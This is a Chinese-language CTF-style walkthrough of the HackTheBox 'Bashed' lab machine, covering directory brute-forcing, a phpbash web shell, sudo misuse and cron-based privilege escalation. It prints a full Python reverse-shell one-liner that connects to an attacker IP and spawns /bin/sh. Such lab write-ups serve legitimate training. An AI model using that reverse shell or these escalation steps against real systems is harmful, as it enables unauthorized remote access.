No.122-HackTheBox-Linux-Bashed-Walkthrough滲透學習

**

HackTheBox-Linux-Bashed-Walkthrough

**

靶機地址:https://www.hackthebox.eu/home/machines/profile/118
靶機難度:初級(4.5/10)
靶機發布日期:2017年12月20日
靶機描述:
Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files. As basic access to the crontab is restricted,

作者:大餘
時間:2020-06-04

請注意:對於所有這些計算機,我是通過平臺授權允許情況進行滲透的。我將使用Kali Linux作爲解決該HTB的攻擊者機器。這裏使用的技術僅用於學習教育目的,如果列出的技術用於其他任何目標,我概不負責。

一、信息收集

在這裏插入圖片描述
可以看到靶機的IP是10.10.10.68…
在這裏插入圖片描述
發現只開放了80端口…
在這裏插入圖片描述
瀏覽web直接跳過…

在這裏插入圖片描述
直接爆破目錄…
Dirbuster發現了dev目錄,其中包含phpbash腳本…
phpbash是個反向外殼…去看看
在這裏插入圖片描述

在這裏插入圖片描述
直接利用反向外殼,文件上傳提權即可…
在這裏插入圖片描述
上傳php簡單shell,獲得了低權外殼…
在這裏插入圖片描述
通過低權外殼,獲得了user_flag信息…
在這裏插入圖片描述
sudo -l發現all,無需任何密碼可以直接bash到scriptmanager用戶…
sudo -u 獲得了scriptmanager用戶權限…
在這裏插入圖片描述
枚舉時發現scripts底層存在test文件腳本信息…
查看test.py文件信息,發現test.py每分鐘執行一次,這可以通過閱讀test.py並查看test.txt的時間戳來推斷,該文本文件由root擁有,因爲root.txt是root權限執行…
只需要修改test.py即可提權…
在這裏插入圖片描述
簡單python_shell…
在這裏插入圖片描述
命令:import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.51",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
等待一分鐘後,自動提權root…獲得了root_flag信息…

由於我們已經成功得到root權限查看user和root.txt,因此完成這臺初級的靶機,希望你們喜歡這臺機器,請繼續關注大餘後期會有更多具有挑戰性的機器,一起練習學習。

如果你有其他的方法,歡迎留言。要是有寫錯了的地方,請你一定要告訴我。要是你覺得這篇博客寫的還不錯,歡迎分享給身邊的人。

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章